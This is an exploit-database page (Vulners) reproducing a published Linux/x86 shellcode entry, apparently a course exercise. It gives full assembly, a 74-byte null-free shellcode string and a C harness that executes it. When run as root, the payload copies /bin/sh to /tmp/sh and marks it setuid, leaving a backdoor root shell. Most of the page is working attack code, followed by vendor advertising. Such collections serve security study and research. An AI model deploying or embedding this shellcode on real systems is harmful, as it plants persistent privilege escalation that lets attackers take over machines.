Vulners
Lucene search
Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)
/*
Title: Linux/x86 - cp /bin/sh /tmp/sh; chmod +s /tmp/sh
Author: absolomb
Website: https://www.sploitspren.com
SLAE-ID: 1208
Purpose: cp shell into /tmp and setuid
Tested On: Ubuntu 14.04
Arch: x86
Size: 74 bytes
Shellcode is register independent and null free.
global _start
section .text
_start:
push 0xb ; execve()
pop eax ;
cdq ; set edx to 0
push edx ; NULL
push word 0x632d ; "c-"
mov edi,esp ; point edi to stack
push edx ; NULL
push 0x68732f2f ; "hs//"
push 0x6e69622f ; "/bin"
mov ebx,esp ; point ebx to stack
push edx ; NULL
jmp short cmd
execute:
push edi ; "c-"
push ebx ; "/bin/sh"
mov ecx,esp ; point to stack
int 0x80 ; execute execve
cmd:
call execute
db "cp /bin/sh /tmp/sh; chmod +s /tmp/sh"
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\xeb\x06\x57\x53\x89\xe1\xcd\x80\xe8\xf5\xff\xff\xff\x63\x70\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x2b\x73\x20\x2f\x74\x6d\x70\x2f\x73\x68";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Apr 2018 00:00Current
7.4High risk
Vulners AI Score7.4